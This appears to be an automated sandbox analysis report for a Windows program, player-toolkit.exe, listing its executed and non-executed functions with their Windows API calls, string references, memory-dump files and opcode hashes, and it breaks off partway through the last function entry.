String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 547a7ed6f14c6528ab9a92b5b467fdd033dbd51890fee19c8e54985123aa8466
Instruction ID: ea5b3ebddf83c08b7af6f07255a3ad181fa86c600354a9e0aec54f97f5f5ece5
Opcode Fuzzy Hash: 547a7ed6f14c6528ab9a92b5b467fdd033dbd51890fee19c8e54985123aa8466
Instruction Fuzzy Hash: 76F0F637200201BFE6202A46DC02F33BF6AEB84731F144399F628561D1EA62F860D6F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: player-toolkit.exe PID: 5216 Parent PID: 3388 player-toolkit.exeCOMMON

Executed Functions

Function 00014C60, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 54COMMON

Download Yara Rule

Strings

Failed to open crypto provider., xrefs: 00014CA2
Microsoft Primitive Provider, xrefs: 00014C86
seed_material.cc, xrefs: 00014CA9
RNG, xrefs: 00014C8B

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Failed to open crypto provider.$Microsoft Primitive Provider$RNG$seed_material.cc
API String ID: 0-4062446982
Opcode ID: 860209486c2fea3b526e6005e8e25898cecb562e79c6123763ab39379dc5bfe2
Instruction ID: 5a257158198ccfb866a9fcb2069b5f2c62df541a854837925a94fb6f05fb59ba
Opcode Fuzzy Hash: 860209486c2fea3b526e6005e8e25898cecb562e79c6123763ab39379dc5bfe2
Instruction Fuzzy Hash: 27014735B8032176C902AA28BC03FCAB3999F80F12F850425FC94B7292E3A1A54D91E2

Uniqueness

Uniqueness Score: -1.00%

Function 0001CF50, Relevance: 23.5, APIs: 6, Strings: 7, Instructions: 716COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(001AD024), ref: 0001CF89
LeaveCriticalSection.KERNEL32(001AD024,?,?), ref: 0001D054
allocator.LIBCONCRTD ref: 0001D143
allocator.LIBCONCRTD ref: 0001D2CE
allocator.LIBCONCRTD ref: 0001D51C

Part of subcall function 000126C0: _Allocate.LIBCONCRTD ref: 000126D4

allocator.LIBCONCRTD ref: 0001D5F2

Strings

-, xrefs: 0001D2DC
,qh, xrefs: 0001D069
c/lib, xrefs: 0001D17D, 0001D308
@,qh, xrefs: 0001D008
SOCI_BACKENDS_PATH, xrefs: 0001D0C7
@,qh, xrefs: 0001CFA5, 0001D2E3, 0001D09F
., xrefs: 0001D27A

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: allocator$CriticalSection$AllocateEnterLeave
String ID: ,qh$-$.$@,qh$@,qh$SOCI_BACKENDS_PATH$c/lib
API String ID: 20448401-462309290
Opcode ID: 7ae37cc1052ab47df55c06c97978a7f4bc014d01b9de6925f517d23e5d4efb04
Instruction ID: 427f4aecdad4ac83bb73de0c35499b82ba0fb6354aa9fe5ac3dc271dd4d7632a
Opcode Fuzzy Hash: 7ae37cc1052ab47df55c06c97978a7f4bc014d01b9de6925f517d23e5d4efb04
Instruction Fuzzy Hash: 9D42A271D002489FDB14CFA8C9847EEBBB5FF49314F24461AE855AB382D734AAC5CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00013CD0, Relevance: 1.7, APIs: 1, Instructions: 173COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00013EC6

Part of subcall function 00015060: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00015098

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep__allrem
String ID:
API String ID: 3145679402-0
Opcode ID: 9ce79a893592cecfbe8ae5f876bc6b483822920172752000694966d16adf880e
Instruction ID: 76fcfbb9983757da610dc3946ad2fb844217bbe8467a185854bb1a8614efb0be
Opcode Fuzzy Hash: 9ce79a893592cecfbe8ae5f876bc6b483822920172752000694966d16adf880e
Instruction Fuzzy Hash: 8B51E575A002158FDB11DF64EC41BEEB3F1FB44714F144529E915AB3C2EB70AA858BC0

Uniqueness

Uniqueness Score: -1.00%

Function 000FE8E1, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 000FB69A: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000FBC11,00000001,00000364,00000005,000000FF,?,00101C73,?,00000004,00000000,?,?), ref: 000FB6DB

_free.LIBCMT ref: 000FE950

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 745144d70ee73f4378499b79f3514071d2c2e1eafc6ef260dc6d240cd15267cd
Instruction ID: f37600747652af45e94374fef1e8e1ad9a35be886870278e1b9ee54b6a096eb1
Opcode Fuzzy Hash: 745144d70ee73f4378499b79f3514071d2c2e1eafc6ef260dc6d240cd15267cd
Instruction Fuzzy Hash: 2101497260439A6BC320CF68C8859E9FBD8FB043B0F144629E655A7AC0E3B06C11CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 000FB69A, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000FBC11,00000001,00000364,00000005,000000FF,?,00101C73,?,00000004,00000000,?,?), ref: 000FB6DB

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ded671dc199aedd50251cfb1613173497791a8c1e64b09fc8165d95bd854e5bb
Instruction ID: b6f0e0c6d276e99736ae7b2cad457672f3b4b5474103a7c5f82696dd4cfc97a4
Opcode Fuzzy Hash: ded671dc199aedd50251cfb1613173497791a8c1e64b09fc8165d95bd854e5bb
Instruction Fuzzy Hash: C2F0E93161412C67DB612B26DC05B7A37DC9F81770B158021BE18DAD90DB38DC00BFE4

Uniqueness

Uniqueness Score: -1.00%

Function 000FCE83, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,000FCE2F,?,00000000,?,00101C73,?,00000004,00000000,?,?,?,000F7D0B), ref: 000FCEB5

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4ed0e53aa554f78d18493ce6aa9a0911db409668291d68ce24c38710f7353ce9
Instruction ID: 673292d113010bf41cffeb3ef7665fcf8f56cc1b9a0285888fc455fdb20f013a
Opcode Fuzzy Hash: 4ed0e53aa554f78d18493ce6aa9a0911db409668291d68ce24c38710f7353ce9
Instruction Fuzzy Hash: 9DE0E53310521D56FB7126756E02FBF3AC88F413A0F250120FE1996D91DB61CC40F1E0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00034C20, Relevance: 22.9, APIs: 15, Instructions: 354COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034C34

Part of subcall function 000E80AA: RaiseException.KERNEL32(E06D7363,00000001,00000003,00011DBC,?,?,?,00011DBC,?,001A0EB0), ref: 000E810A

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034C64
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034C94
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034CC4

Part of subcall function 000338B0: ___std_exception_copy.LIBVCRUNTIME ref: 000338F2

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034D24
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034D54
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034D84
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034DB4
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034DE4
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034E14
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034E44
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034E74
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034EA4
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034ED4
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00034F04

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: std::invalid_argument::invalid_argument$ExceptionRaise___std_exception_copy
String ID:
API String ID: 4192866231-0
Opcode ID: 466d8c3bb7f1691601ad6e3f389e2cf9734edc63e9d0ba6983d4163d2402839c
Instruction ID: 72d03ff412b061381963666d7b2d9b1178389f7fed30d0892d74236614c5e0df
Opcode Fuzzy Hash: 466d8c3bb7f1691601ad6e3f389e2cf9734edc63e9d0ba6983d4163d2402839c
Instruction Fuzzy Hash: F171FF7096020CBBCB04FBA5DD46DEEF7BCAF04A00F904469B915A7952EB60AA098795

Uniqueness

Uniqueness Score: -1.00%

Function 0001C8D0, Relevance: 19.7, APIs: 5, Strings: 6, Instructions: 409libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(001AD024,6871E12C,@,qh,?), ref: 0001C912
LoadLibraryA.KERNEL32(?,_4_0.dll,00000008,?,00000000,soci_,00000005,00000000,?,6871E12C,@,qh,?), ref: 0001C9A6
LoadLibraryA.KERNEL32(000000FF,?,?,?,?,-001AD007,-001AD007,?,001521D4,00000001,_4_0.dll,00000008,?,00000000,soci_,00000005), ref: 0001CC1A
GetProcAddress.KERNEL32(00000000,?), ref: 0001CD33
FreeLibrary.KERNEL32(?,6871E12C,@,qh,?), ref: 0001CE08

Strings

factory_, xrefs: 0001CD02
Failed to find shared library for backend , xrefs: 0001CDC7
soci_, xrefs: 0001C94E, 0001CAA3
Failed to resolve dynamic symbol: , xrefs: 0001CE1B
@,qh, xrefs: 0001C8F2
_4_0.dll, xrefs: 0001C964, 0001CABC

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Load$AddressFreeProc
String ID: @,qh$Failed to find shared library for backend $Failed to resolve dynamic symbol: $_4_0.dll$factory_$soci_
API String ID: 2632591731-636220763
Opcode ID: aa88a9d25a082c3c9a859c1bb231e248e838f312f9d2691301c7192474e55f8d
Instruction ID: 85758634aa23d8ac2dec4016a819d5c964e7be70b974989a8018dd97eb974586
Opcode Fuzzy Hash: aa88a9d25a082c3c9a859c1bb231e248e838f312f9d2691301c7192474e55f8d
Instruction Fuzzy Hash: 0AE1B171A40218DBEB18DB68CD89FDDBB75FF45310F108298E415AB292DB30DAC5CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00103701, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 000FBA6F: GetLastError.KERNEL32(?,?,?,000F1742,?,?,00000000,?,000F1119,?,?,?), ref: 000FBA74
Part of subcall function 000FBA6F: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,000F1119,?,?,?), ref: 000FBB12

GetACP.KERNEL32(?,?,?,?,?,?,000F8998,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001037C2
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,000F8998,?,?,?,00000055,?,-00000050,?,?), ref: 001037ED
_wcschr.LIBVCRUNTIME ref: 00103881
_wcschr.LIBVCRUNTIME ref: 0010388F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00103950

Strings

utf8, xrefs: 001038BF

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 7cd181bb3b9619fba25d4745989b1d6e920ab42e1f9721def895510389ec1c47
Instruction ID: ecc7044914f3832d480cab57abe14c492a7d8d9611934998ecc97325b824f530
Opcode Fuzzy Hash: 7cd181bb3b9619fba25d4745989b1d6e920ab42e1f9721def895510389ec1c47
Instruction Fuzzy Hash: 507138B1600706AAEB29AB74CC46BBA73ACEF54700F14416AF5A5DB1C1EBF0DB419760

Uniqueness

Uniqueness Score: -1.00%

Function 00103E8D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,001041AB,00000002,00000000,?,?,?,001041AB,?,00000000), ref: 00103F26
GetLocaleInfoW.KERNEL32(00000000,20001004,001041AB,00000002,00000000,?,?,?,001041AB,?,00000000), ref: 00103F4F
GetACP.KERNEL32(?,?,001041AB,?,00000000), ref: 00103F64

Strings

ACP, xrefs: 00103EAB
OCP, xrefs: 00103EE1

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: fec7b12c91a2da19d4c63227418a4c429bf95957a954cac418ac3147020d13e2
Instruction ID: 7378331b8ca447cda0b419e3a46ba541478215b4965441ad6231119a61e2c6eb
Opcode Fuzzy Hash: fec7b12c91a2da19d4c63227418a4c429bf95957a954cac418ac3147020d13e2
Instruction Fuzzy Hash: F621D372B00102AADB359F68C904A9773BEAF54F10B568524F9AADB180E7B2DF40C751

Uniqueness

Uniqueness Score: -1.00%

Function 00100124, Relevance: 7.8, APIs: 5, Instructions: 330timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001001E1
_free.LIBCMT ref: 001003AD
_free.LIBCMT ref: 00100425
GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,001005E6,?,?,00000000), ref: 00100437

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 960f82d049b4696eb31fa82557fdbe826d9792e6dfada3c42f8946ecb24ea0af
Instruction ID: 55edb018fc5cb830c5148beb7bad15770032805d03bcc3471dfdc3ddf9885287
Opcode Fuzzy Hash: 960f82d049b4696eb31fa82557fdbe826d9792e6dfada3c42f8946ecb24ea0af
Instruction Fuzzy Hash: 87A13971900219AFDB11AF64DC42BBE77B9EF49310F14406AFA48EB5D2E7B08E40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00104062, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 000FBA6F: GetLastError.KERNEL32(?,?,?,000F1742,?,?,00000000,?,000F1119,?,?,?), ref: 000FBA74
Part of subcall function 000FBA6F: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,000F1119,?,?,?), ref: 000FBB12

Part of subcall function 000FBA6F: _free.LIBCMT ref: 000FBAD1
Part of subcall function 000FBA6F: _free.LIBCMT ref: 000FBB07

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0010416E
IsValidCodePage.KERNEL32(00000000), ref: 001041B7
IsValidLocale.KERNEL32(?,00000001), ref: 001041C6
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0010420E
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0010422D

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: bcb9c805e327450dc04702c6d8699965a118fc13a3408eba771588df7e005be8
Instruction ID: 4f9a38b9ab33aed44430280c1c3e6e5569921dfe2af676d4ae5114879681c75c
Opcode Fuzzy Hash: bcb9c805e327450dc04702c6d8699965a118fc13a3408eba771588df7e005be8
Instruction Fuzzy Hash: 6F5185B1A00209AFDF11DFA5DC81ABE77B8BF58700F044469F651EB1D0E7B0AA80CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000E6217, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000E6223
IsDebuggerPresent.KERNEL32 ref: 000E62EF
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000E630F
UnhandledExceptionFilter.KERNEL32(?), ref: 000E6319

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 1537fca8091412face8755d7d42e245223f44c73f704df39967a3c8b59547257
Instruction ID: b4b4956bd3ffa8246719c0715c574a3e145ae70bdfbbd4ba496d08d82bb6bd13
Opcode Fuzzy Hash: 1537fca8091412face8755d7d42e245223f44c73f704df39967a3c8b59547257
Instruction Fuzzy Hash: 52310775D45318DFDB51DFA5E989BCDBBB8AF18300F1040AAE40CAB250EB719A858F45

Uniqueness

Uniqueness Score: -1.00%

Function 000F3B93, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 000F3C8B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 000F3C95
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 000F3CA2

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a410795e9d1dfb83a1ef168228b2949f612b82afc3804e01db94301fda760207
Instruction ID: 86864ad28ce9b749e6937ef69b6de581577441d6be610aea0b525f9fde010be5
Opcode Fuzzy Hash: a410795e9d1dfb83a1ef168228b2949f612b82afc3804e01db94301fda760207
Instruction Fuzzy Hash: 2531D27490122CABCB61DF64DD89BDCBBB8AF08310F5041EAE51CA7291EB309F858F45

Uniqueness

Uniqueness Score: -1.00%

Function 000E552B, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000E5541

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: be3134fd6f71c2434a5786280c25633339ac0571f8b3bc882bc5f8629ce33a18
Instruction ID: a1e4e0fc12ce606cb2921181edacdd76c060558eec14f570f18aa1fc59a53892
Opcode Fuzzy Hash: be3134fd6f71c2434a5786280c25633339ac0571f8b3bc882bc5f8629ce33a18
Instruction Fuzzy Hash: CD5191B1A10A45CFDB64CF59EC817AABBF1FB48319F64842AD415EBA50D374DD80CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001039EE, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 000FBA6F: GetLastError.KERNEL32(?,?,?,000F1742,?,?,00000000,?,000F1119,?,?,?), ref: 000FBA74
Part of subcall function 000FBA6F: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,000F1119,?,?,?), ref: 000FBB12

EnumSystemLocalesW.KERNEL32(00103B14,00000001,00000000,?,-00000050,?,00104142,00000000,?,?,?,00000055,?), ref: 00103A60

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: df9d905a3232710989e7b975eee48a3adf8cc1f0d85565af161a508f9cd3c01e
Instruction ID: e843cb00dc764630096021434b16967fd94285d39c10b35afeaa83ab05254f21
Opcode Fuzzy Hash: df9d905a3232710989e7b975eee48a3adf8cc1f0d85565af161a508f9cd3c01e
